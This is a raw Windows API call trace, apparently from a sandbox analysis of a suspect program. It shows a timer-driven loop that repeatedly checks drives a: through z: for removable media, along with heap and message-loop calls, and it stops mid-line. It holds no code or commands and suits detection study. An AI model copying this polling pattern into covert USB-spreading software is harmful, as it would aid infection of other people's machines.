PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0221.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0221.953] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0221.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0221.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.954] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0221.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0221.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0221.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0221.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0221.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0221.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0221.955] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.955] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.955] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.955] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.955] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.956] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.956] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.956] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.956] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.956] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.957] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.957] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.957] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.957] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.958] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.958] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.958] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.958] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.959] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.959] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.959] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.959] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.959] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.960] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.960] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.960] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.960] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0221.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0221.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0221.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0221.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0221.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0221.961] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0221.962] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0221.962] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0221.962] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0221.962] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0221.962] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0221.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0221.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0221.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0221.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0221.963] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0221.963] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0221.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.963] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.964] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.964] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0221.964] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0221.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0221.964] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.965] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.965] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.965] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.966] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.966] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.966] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.966] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.966] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.966] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0222.141] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0222.141] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0222.141] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0222.142] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0222.142] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0222.142] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0222.142] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0222.142] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0222.142] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0222.143] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0222.143] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0222.143] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0222.143] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0222.143] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0222.143] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0222.143] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0222.144] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0222.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0222.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0222.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0222.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0222.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0222.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0222.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.144] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0222.145] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0222.145] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0222.145] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0222.145] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0222.145] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0222.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0222.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0222.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0222.146] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0222.146] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0222.146] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0222.146] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0222.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.147] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0222.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0222.147] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0222.147] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0222.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0222.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0222.147] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0222.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0222.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.148] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0222.148] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0222.148] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0222.148] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0222.149] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0222.149] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0222.149] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0222.149] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0222.149] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0222.150] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0222.150] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0222.150] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0222.150] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0222.151] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0222.151] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0222.151] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0222.151] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0222.151] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0222.151] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0222.152] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0222.152] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0222.152] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0222.152] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0222.152] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0222.152] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0222.152] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0222.153] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0222.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0222.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0222.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0222.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.153] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0222.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0222.154] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0222.154] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, 